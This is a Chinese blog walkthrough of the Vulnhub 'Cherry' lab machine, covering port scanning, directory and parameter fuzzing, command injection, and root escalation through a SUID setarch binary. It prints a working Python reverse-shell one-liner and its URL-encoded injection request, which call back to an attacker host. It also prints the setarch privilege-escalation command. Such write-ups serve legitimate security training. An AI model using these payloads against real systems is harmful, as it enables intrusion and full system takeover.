首页 > 系统相关 >Vulnhub之Cherry靶机详细测试过程(获得Shell采取不同的方法)

Vulnhub之Cherry靶机详细测试过程(获得Shell采取不同的方法)

时间:2023-01-31 10:23:11浏览次数:48  
标签:Shell x1a Cherry x08 Vulnhub x0b kali root x05

Cherry

识别目标主机IP地址

由于目标主机无法自动获取IP地址,参照本人另文首先解决该问题。

─(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:92:75:55      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.178  08:00:27:8b:af:48      1      60  PCS Systemtechnik GmbH          

利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.178

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.178 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 20:40 EST
Nmap scan report for 192.168.56.178
Host is up (0.000076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8bc6f56e2ca29513a51084a50c83b7ae (RSA)
|   256 38d823063e862ac90f163f2393d9a106 (ECDSA)
|_  256 95b9d4f0984ad90990a45da79d6dce76 (ED25519)
80/tcp    open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Cherry
|_http-server-header: nginx/1.18.0 (Ubuntu)
7755/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Cherry
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=1/30%Time=63D87184%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:8B:AF:48 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.01 seconds

NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、7755(HTTP)、33060(Mysqlx)

获得Shell

80端口

将图片下载到Kali Linux本地进行分析:

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg  nmap_full_scan
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ steghide extract -sf img.jpg                               
Enter passphrase: 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ stegseek img.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.95% (133.4 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ exiftool img.jpg             
ExifTool Version Number         : 12.52
File Name                       : img.jpg
Directory                       : .
File Size                       : 59 kB
File Modification Date/Time     : 2023:01:30 20:43:41-05:00
File Access Date/Time           : 2023:01:30 20:44:03-05:00
File Inode Change Date/Time     : 2023:01:30 20:43:41-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 72
Y Resolution                    : 72
Image Width                     : 1024
Image Height                    : 1024
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1024x1024
Megapixels                      : 1.0

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/robots.txt     
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ nikto -h http://192.168.56.178
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.178
+ Target Hostname:    192.168.56.178
+ Target Port:        80
+ Start Time:         2023-01-30 20:45:10 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-01-30 20:45:24 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (nginx/1.18.0) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.178
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/01/30 20:46:28 Starting gobuster in directory enumeration mode
===============================================================
/backup               (Status: 301) [Size: 178] [--> http://192.168.56.178/backup/]
Progress: 214882 / 220561 (97.43%)===============================================================
2023/01/30 20:46:43 Finished
===============================================================
                                                                                  

gobuster发现了backup目录,访问该目录,返回禁止访问

7755端口

自然地利用访问访问7755端口下的backup目录,发现可以正常访问,将文件下载到本地:

┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/latest.tar.gz .                
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip .   
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak 
mv: missing destination file operand after '/home/kali/Downloads/master.zip.bak'
Try 'mv --help' for more information.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ mv ~/Downloads/master.zip.bak .
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg  latest.tar.gz  master.zip  master.zip.bak  nmap_full_scan

而访问/backup/command.php,返回为空,是否需要FUZZ 参数?暂时搁置,看下下载的文件中有无有价值的信息

┌──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ gobuster dir -u http://192.168.56.178:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.178:7755
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,txt
[+] Timeout:                 10s
===============================================================
2023/01/30 20:54:25 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 281]
/index.html           (Status: 200) [Size: 640]
/.php                 (Status: 403) [Size: 281]
/info.php             (Status: 200) [Size: 72699]
/backup               (Status: 301) [Size: 324] [--> http://192.168.56.178:7755/backup/]
/.php                 (Status: 403) [Size: 281]
/.html                (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]
Progress: 1097489 / 1102805 (99.52%)===============================================================
2023/01/30 20:55:31 Finished
===============================================================

──(kali㉿kali)-[~/Vulnhub/Cherry/wordpress]
└─$ wfuzz -c -u 'http://192.168.56.178:7755/backup/command.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 22
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.178:7755/backup/command.php?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                      
=====================================================================

000001626:   200        13 L     25 W       306 Ch      "backup"            

很快就FUZZ出参数名称为backup,手动验证一下,确实如此。

尝试了若干种反弹shell的方法,最后利用python可以成功获得shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.206",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
http://192.168.56.178:7755/backup/command.php?backup=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.178] 45556
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cherry:/var/www/html/backup$ 

提权

将linpeas.sh脚本上传至目标主机/tmp目录下,修改权限,执行该脚本,从脚本执行结果得知:


                                         ╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                       
                                         ╚═══════════════════╝                                                                
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid                                                   
strings Not Found                                                                                                             
-rwsr-xr-x 1 root root 39K Mar  7  2020 /usr/bin/fusermount                                                                   
-rwsr-xr-x 1 root root 39K Apr  2  2020 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 55K Apr  2  2020 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-sr-x 1 root root 27K Apr  2  2020 /usr/bin/setarch
-rwsr-xr-x 1 root root 87K May 28  2020 /usr/bin/gpasswd

可以利用setarch命令的SUID位进行提权

参考GTFOBINS网站的提权方法进行提权:

www-data@cherry:/tmp$  /usr/bin/setarch $(arch) /bin/sh -p
 /usr/bin/setarch $(arch) /bin/sh -p
# cd /root
cd /root
# ls -alh
ls -alh
total 44K
drwx------  5 root root 4.0K Sep  7  2020 .
drwxr-xr-x 20 root root 4.0K Sep  7  2020 ..
-rw-------  1 root root  164 Sep  7  2020 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Sep  7  2020 .local
-rw-------  1 root root   18 Sep  7  2020 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
drwx------  2 root root 4.0K Sep  7  2020 .ssh
-rw-r--r--  1 root root  255 Sep  7  2020 .wget-hsts
-rw-r--r--  1 root root   46 Sep  7  2020 proof.txt
drwxr-xr-x  3 root root 4.0K Sep  7  2020 snap
# cat proof.txt
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
#  

成功拿到了root shell以及root flag

标签:Shell,x1a,Cherry,x08,Vulnhub,x0b,kali,root,x05
From: https://www.cnblogs.com/jason-huawen/p/17078093.html

相关文章

  • Linux系统Shell脚本第三章:for、while循环及脚本实操
    目录一、echo命令二、查看当前系统的时间—date命令三、for循环语句四、while循环语句结构(迭代)五、until循环语句结构六、continue和break  一、echo命令ech......
  • Win7 安装powershell 5.1
    检查本机powershell的版本PS>$PSVersionTable.PSversionMajorMinorBuildRevision20-1-1当前版本位2.0版本下载WindowsManagementFram......
  • 【悲伤的Debug日志】Windows Anaconda 运行报错 ImportError: DLL load failed while
    今天在Windows10上安装Anaconda(Anaconda|AnacondaDistribution)。首次安装选择了“在所有用户上安装”,发现进入下一步时无法勾选“将Anaconda加入PATH环境变......
  • Vulnhub之Chill Hack靶机详细测试过程
    ChillHack作者:jason_huawen靶机信息名称:ChillHack:1地址:https://www.vulnhub.com/entry/chill-hack-1,622/识别目标主机IP地址由于目标主机无法自动获取IP地址......
  • Shell变量替换
    变量替换之删除指定字符串语法作用${var#pattern}将$var的值从左侧删除与模式pattern匹配的最短字符串并返回。${var##pattern}将$var的值从左侧删除与模......
  • Linux 常用替换命令三种方法(perl、shell、sed)
    举例在文件服务器上有一文件,文件名字:aaa.txt文件内容为:name=guodongsex=nanage=1001、perl:find-name'文件名'|xargsperl-pi-e's|被替换的字符串|替换后的字......
  • Windows Terminal PowerShell智能提示
    安装最新版本的PSReadLineInstall-ModulePSReadLine-RequiredVersion2.2.6-Force用noteapd$PROFILE打开配置文件,添加如下配置Import-ModulePSReadLineSet-PSRea......
  • Django shell交互模式操作数据库
    打开shell交互模式命令pythonmanage.pyshell新增数据先进入交互模式,再导入类,用create创建数据,最后save(不save也可以),完成后可在数据库表中查看到创建的数据查询数......
  • shell 文件修改时间
    date+%s查看当前时间,以秒为单位。stat-c%Y$file查看$file修改时间距今多少秒。timestamp=`date+%s`filetimestamp=`stat-c%Y$file`timecha=$[$timestamp-......
  • shell 脚本中利用git下载依赖关系示例
    #!/usr/bin/envbash#打开显示调试信息set-x#########################################download&builddependsoftware###################################......